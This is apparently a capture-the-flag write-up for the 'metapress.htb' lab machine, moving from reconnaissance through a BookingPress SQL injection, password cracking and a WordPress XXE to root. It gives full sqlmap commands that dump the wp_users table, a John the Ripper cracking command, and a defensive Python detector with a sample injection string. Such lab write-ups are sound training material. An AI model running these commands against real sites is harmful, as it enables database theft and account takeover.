I scan with the nmap tool.

I add the domain and its IP address to /etc/hosts.

I scan with gobuster, both DNS and directory.

I find a vulnerable version of BookingPress under http://metapress.htb/events/

I follow the same instructions as in the image above. I have to find the nonce, and I find it, so I run the exploit and get the response.


It may be a SQL injection, so I try it.
sqlmap -u "http://metapress.htb/wp-admin/admin-ajax.php" --method POST --data "action=bookingpress_front_get_category_services&_wpnonce=ad14d8652b&category_id=123&total_service=111" -p total_service --level=5 --risk=3 --dbs
Yes, there is a SQL vulnerability.

sqlmap -u "http://metapress.htb/wp-admin/admin-ajax.php" --method POST --data "action=bookingpress_front_get_category_services&_wpnonce=ad14d8652b&category_id=123&total_service=111" -p total_service --level=5 --risk=3 -D blog --tables
sqlmap -u "http://metapress.htb/wp-admin/admin-ajax.php" --method POST --data "action=bookingpress_front_get_category_services&_wpnonce=ad14d8652b&category_id=123&total_service=111" -p total_service --level=5 --risk=3 -D blog -T wp_users --dump
sqlmap says where the scan results are.
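
On the defensive side, the requests above all go to admin-ajax.php with the bookingpress_front_get_category_services action and a numeric total_service. This is an added example (not part of the original writeup and not BookingPress code) that flags logged POST bodies where those parameters are not plain integers; it assumes request bodies are captured by a WAF or audit log, and the sample records are constructed.

```python
import re
from urllib.parse import parse_qs

# Parameters the page's requests send as plain integers (assumption: the
# endpoint expects numeric values for both).
NUMERIC_PARAMS = ("category_id", "total_service")
ACTION = "bookingpress_front_get_category_services"
INT_RE = re.compile(r"\d{1,10}")

def suspicious_params(body: str) -> list[str]:
    """Return the numeric parameters whose value is not a plain integer."""
    fields = parse_qs(body, keep_blank_values=True)
    if ACTION not in fields.get("action", []):
        return []  # a different AJAX action, out of scope for this rule
    bad = []
    for name in NUMERIC_PARAMS:
        values = fields.get(name, [])
        if any(not INT_RE.fullmatch(v.strip()) for v in values):
            bad.append(name)
    return bad

def review(records):
    """Return (client, bad_params) for each logged POST that fails the check."""
    findings = []
    for client, path, body in records:
        if path.endswith("/wp-admin/admin-ajax.php"):
            bad = suspicious_params(body)
            if bad:
                findings.append((client, bad))
    return findings

# Constructed sample records: (client address, request path, POST body).
BASE = "action=" + ACTION + "&_wpnonce=0000000000&category_id=123"
SAMPLE = [
    ("192.0.2.10", "/wp-admin/admin-ajax.php", BASE + "&total_service=111"),
    ("192.0.2.66", "/wp-admin/admin-ajax.php",
     BASE + "&total_service=111%20OR%201%3D1"),
    ("192.0.2.10", "/wp-admin/admin-ajax.php",
     "action=heartbeat&total_service=abc"),
]

if __name__ == "__main__":
    for client, bad in review(SAMPLE):
        print(f"{client}: non-numeric value in {', '.join(bad)}")
```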


I crack the manager's hash with John the Ripper.
john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
I log in to the website.


WordPress 5.6.2 has an XXE vulnerability.
https://blog.wpsec.com/wordpress-xxe-in-media-library-cve-2021-29447/
I follow the instructions in the link above.


I upload the wav file and I get the response.

I decode it from base64.

I change the directory. I have a look at the WordPress structure.

I modify my exploit as in the image above.


I find FTP credentials. There is an interesting file that I have to look at, so I download the PHP file and find a credential.


I connect over SSH. There is a secret file under jnelson's home directory.

I try to crack the PGP private key and it succeeds.


I execute the command and I am root.
